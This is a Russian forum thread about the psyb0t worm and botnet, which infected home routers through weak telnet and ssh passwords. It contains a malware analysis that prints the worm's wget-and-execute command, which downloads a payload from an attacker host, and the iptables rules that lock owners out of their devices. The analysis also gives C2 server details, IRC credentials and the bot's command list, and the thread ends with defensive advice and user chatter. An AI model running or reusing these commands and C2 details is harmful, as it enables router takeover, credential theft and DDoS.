Cерьезную опасность обнаружили администраторы сайта DroneBL. Примерно две недели назад на сайт была совершена DDoS-атака. При расследовании инцидента выяснилось, что атаку производили зараженные роутеры и DSL-модемы. Дальнейший анализ показал, что в Интернете появилась первая ботнет-сеть, которая базируется не на ПК и серверах, а на сетевом оборудовании домашнего уровня. Эта вредоносная сеть вместе с червем, распространяющим заразу, получила название «psyb0t».
Механизм заражения «psyb0t» оказался довольно необычным. Заражению подвержены любые устройства с маршрутизацией пакетов на базе операционной системы Linux Mipsel, снабженные административным интерфейсом, либо открывающие доступ через службы sshd или telnetd для демилитаризованной зоны DMZ, если у них заданы слабые сочетания имени пользователя и пароля (включая устройства openwrt/dd-wrt). Червь «psyb0t» использует алгоритм подбора имен пользователя и паролей, а также несколько стратегий для перехвата управления устройством.
После заражения червь «psyb0t» встраивает фрагмент вредоносного кода в операционную систему устройства – в состав червя входят варианты кода для нескольких версий системы Mipsel, они загружаются с центрального сервера злоумышленников. Затем червь закрывает конечному пользователю доступ к устройству по telnet, sshd и через веб-интерфейс, а сам начинает исследовать все проходящие через устройство пакеты, выуживая из них различные имена и пароли. Также червь пересылает своим владельцам информацию о наличии в локальной сети серверов с уязвимыми конфигурациями службы phpMyAdmin и СУБД MySQL. По данным DroneBL, уже сейчас в ботнет-сети насчитывается более 100 тысяч активных зараженных устройств, используемых для похищения частной информации и проведения крупномасштабных DDoS-атак. Особую опасность, по мнению первооткрывателей, представляет то, что большинство домашних пользователей, скорее всего, не смогут заметить присутствия червя «psyb0t» в своей сети.
Не успело подробное описание червя появиться в блоге DroneBL, как поступила новая информация автора psyb0t. Он уверяет, что написал червя с исследовательскими целями и теперь прекращает дальнейшую работу над ним. Также он уверяет, что сумел захватить порядка 80 000 устройств, но никогда не использовал этот ботнет для DDoS-атак, фишинга или кражи личных данных.
Примечание paxlo:
После попадания в систему, сифилис использует следующую стратегию:
1) Запускает shell через имеющийся CLI.
cli> shell
3) Закачивает эксплоит, сохраняет его вместо удалённого файла и запускает:
# wget http://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp &&
chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &
4) В целях собственной безопасности червь использует встроенный в железку firewall (iptables),
блокируя доступ к портам через которые она управляется (telnet, ssh, web).
# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP
Для управления зараженными устройствами используется протокол IRC.
После заражения устройство пытается подключится к запаролленому IRC серверу (командный центр) и ждет оттуда инструкций.
"Командным центром" червя, с которого происходят все запросы на управление бот сетью, является домен strcpy.us.to.
IP адреса:
202.71.102.110 (Малайзия)
202.67.218.33 (Гонг-Конг)
216.199.217.170 (США)
207.155.1.5 (США)
Порт подключения: 5050
Пароль: $!0@
Канал: #mipsel
Ключ: %#8b
Ник подключившегося начинается на [NIP] далее идет случайня последовательность. Например [NIP]-IBM6N4SKA.
Теперь злоумышленникам достаточно подать нужную команду в IRC для дальшнейших действий со стороны железок.
Список наиболее интересных команд:
.login - залогиниться в ботнете
.logout - вылогиниться
.exit - вылогиниться из ботнета и удалиться с железки
.sh - запустить шелл
.tlist - вывести список процессов
.kill - убить процесс
.killall - убить все текущие процессы
.silent - перестать посылать данные в канал
.getip - показать WAN IP бота
.visit - атаковать URL используя GET запросы
.scan - сканировать диапазон адресов на потенциальную уязвимость
.rscan - сканировать CIDR диапазон на потенциальную уязвимость
.lscan - тоже для что и .scan, но для локальной сети
.lrscan - тоже для что и .rscan, но для локальной сети
.sql - сканировать MySQL сервер на на уязвимости
.pma - сканировать phpMyAdmin на на уязвимости
.sleep - даёт команду боту приостановить деятельность
.upgrade - обновить червя с сайта распространителя
.ver - возвращает версию червя
.rs - получить обнаруженные логины и ссылки на rapidshare
.rsgen - сгенерировать ложную рапидную ссылку и отправить пользователю в браузер
.wget - скачать ссылку
.r00t - пробовать повысить локальные привилегии до рута используя эксплоит vmsplice
.sflood - послать SYN пакет на IP
.uflood - послать UDP пакет на IP
.iflood - послать ICMP пакет на IP
.pscan - сканировать порты на указанном IP
.fscan - подбор паролей на FTP сервисе указанного IP
Самый простой и действенный метод защиты от данного червя - вернуть устройство к заводским настройкам (HARD RESET), залить последнюю версию прошивки, НИ В КОЕМ СЛУЧАЕ не использовать заводские логин:пароль для администрирования железки, а использовать криптостойкие пароли (желательно более 8 символов, символы A-Z, a-z, 0-9, спецсимволы). Также необходимо по возможности отключить порты 21, 22 и WEB консоль со стороны WAN.
Никогда вопросов глупых никому не задавай, а не то ещё глупее ты найдёшь на них ответ"... (С)Остер
Опыт, как и половое бессилие, приходит с годами....
Все такие милые... покажите, куда блевать...
ALEXLIDER
так дело в том, что , скажем, д-линк 2640 имеет такую линягу (и это надо рыть по нетам, в инструкции фигурирует "прошивка") а тот же старый пердун 2300\2500 какой-нибудь мохнатый линь, который этому не подвержен (я просто для примера) а может длинки поголовно уязвимы, а те же зиксели омни плюс, времен царя гороха (адсл роутеры) не имеют... единственно знаю что асусы и длинки имеют практически одни и те же потроха (различаются ОЗУ и размером флеша) посему здесь они явно пересекаются, а вот моноволл или пфсенс, который накатывается отдельно на девайсы - он не должен быть уязвим, хотя вполне может работать на современном маршрутизаторе класса SoHo
ALEXLIDER
не, ну так-то да, я про принципиальную уязвимость, например я видел говнороутеры, у которых ни SSH ни телнет не поддерживались, т.е. зачаточный уровень впринципе.
vk6666 писал(а):у которых ни SSH ни телнет не поддерживались, т.е. зачаточный уровень впринципе.
А может там криво обрезана прошивка, типа есть старшая модель, где все это поддерживается, а тут вроде просто как не отображается в настройках.
Хотя примерный список неплохо все арвно узнать.
Вот к примеру мой на линухе?
ALEXLIDER
все на линухе, главное знать функционал, и что по дефолту открыто, сегодняшние асусы и длинки - самая дыра, по идее, циски, которые имеют свой иос(а я недавно точку цисковскую ковырял) имеют свой залив, и в случае совсем кошерной модели - иос, который поддерживает вланы, переброс ССИД на соседнюю точку и контроль точек через контроллер, т.е. не типовая быдлозаливка.
ALEXLIDER писал(а):внутри имеют кондеры на 105 гр.
наконец-то..
а то я видел такие только на SOYO Dragon II KT880 (материнка в компе жены).
Добавлено через 3 минуты 26 секунд:
ALEXLIDER писал(а):то бишь не зря я за Зузель переплатил, в этом случае?
возможно что так ( про сабж не берусь утверждать), ибо на них куда меньше всяких там "суперпрошивок" выходит, да и народ их редко берет (а зря).
т.е. одним словом "не типовуха", в отличие от асусов\длинков\тплинков\тренднетов